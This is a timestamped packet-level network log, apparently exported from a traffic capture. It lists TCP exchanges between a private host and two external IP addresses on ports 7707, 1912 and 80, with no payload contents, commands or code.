Jul 6, 2024 13:27:53.350708961 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.350719929 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.350732088 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.350766897 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.350831032 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.358804941 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.358825922 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.358835936 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.358917952 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.358927965 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.358942986 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.358947992 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.358954906 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.358968019 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.359071970 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359102011 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.359119892 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359132051 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359152079 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.359177113 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.359180927 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359281063 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359353065 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359364986 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359440088 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.359457016 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359469891 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359481096 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359493971 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359522104 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.359559059 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.359589100 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.359997034 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360008001 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360018969 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360081911 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.360081911 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.360105991 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360117912 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360129118 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360141039 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360161066 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.360255003 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.360366106 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360378027 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360389948 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360402107 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360413074 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360424995 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360425949 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.360438108 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360450029 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360460997 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.360466003 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.360501051 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.360501051 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.412882090 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.415123940 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.419934988 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.434998989 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.443150043 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443161011 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443171024 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443253040 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443258047 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.443265915 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443275928 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443293095 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443305016 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443310976 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.443315983 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443329096 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443331957 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.443340063 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.443346024 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443380117 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.443526030 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443536043 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443547010 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443557978 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443568945 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443573952 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.443582058 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443610907 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.443610907 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.443819046 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443830013 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443869114 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443877935 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443883896 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443888903 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443896055 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.443928957 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.444102049 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.444371939 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444381952 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444387913 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444394112 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444403887 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444415092 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444427013 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444441080 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444447041 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.444447041 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.444515944 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.444648981 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444659948 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444703102 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444711924 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444721937 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444730043 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.444741011 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.444756031 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444766998 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444777966 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444788933 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444797039 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.444801092 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.444818020 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.444839954 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.448788881 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.448800087 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.448810101 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.448883057 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.448920965 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.448932886 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.448941946 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.448977947 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.448993921 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.449023008 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.450306892 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.450350046 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.450469017 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.598535061 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.599688053 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.608863115 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.787573099 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.791130066 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.795974970 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.973938942 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.019515991 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.020123959 CEST	80	49804	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:54.020365953 CEST	80	49804	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:54.020415068 CEST	49804	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:54.026134968 CEST	49804	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:54.233303070 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.242753983 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.242765903 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.242774010 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.242783070 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.242825985 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.242872000 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.242881060 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.242916107 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.243035078 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243045092 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243053913 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243081093 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.243096113 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.243110895 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243119955 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243166924 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.243242025 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243249893 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243257046 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243287086 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.243308067 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.243510962 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243550062 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.243665934 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243674040 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243717909 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.243738890 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.243822098 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.243864059 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.244077921 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.244123936 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.249803066 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.249857903 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.249948025 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.249957085 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250020981 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.250099897 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250150919 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.250273943 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250283003 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250329971 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.250371933 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250380993 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250389099 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250425100 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.250530958 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250540018 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250547886 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250559092 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250566959 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250592947 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.250664949 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250674009 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250786066 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250794888 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250802040 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250809908 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250818968 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250827074 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.250977039 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.251112938 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251121044 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251128912 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251137972 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251147032 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251153946 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251161098 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.251163960 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251176119 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251177073 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.251185894 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251192093 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.251199961 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251209021 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251213074 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.251219034 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251228094 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251229048 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.251236916 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.251275063 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.251291037 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.254563093 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254581928 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254621983 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.254631996 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254642010 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254677057 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.254754066 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254762888 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254793882 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254802942 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254858971 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254868031 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254873991 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254920959 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254930019 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254941940 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254968882 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254977942 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.254995108 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255090952 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255100012 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255103111 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255119085 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255130053 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255140066 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255341053 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255348921 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255424023 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255433083 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255475998 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255494118 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255542994 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255628109 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255637884 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255646944 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255671024 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255678892 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255707026 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255749941 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255830050 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255839109 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255841970 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255923033 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.255966902 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256088972 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.256113052 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256123066 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256130934 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256143093 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256148100 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.256195068 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256205082 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256232977 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256273031 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256299973 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256308079 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256366968 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256375074 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256402969 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256416082 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256443024 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256453991 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256472111 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256534100 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256582022 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256589890 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256618977 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256627083 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256649971 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256681919 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256690025 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256829023 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256844997 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256855965 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256866932 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256875992 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256885052 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256901979 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256946087 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256953955 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.256998062 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.257050991 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.257061958 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.257100105 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.257110119 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.257164001 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.257173061 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.257225990 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.257234097 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.257244110 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.257281065 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.259449959 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.260370016 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.260379076 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.260595083 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.260603905 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.260761023 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.260953903 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.261014938 CEST	49779	1912	192.168.2.4	94.232.249.204
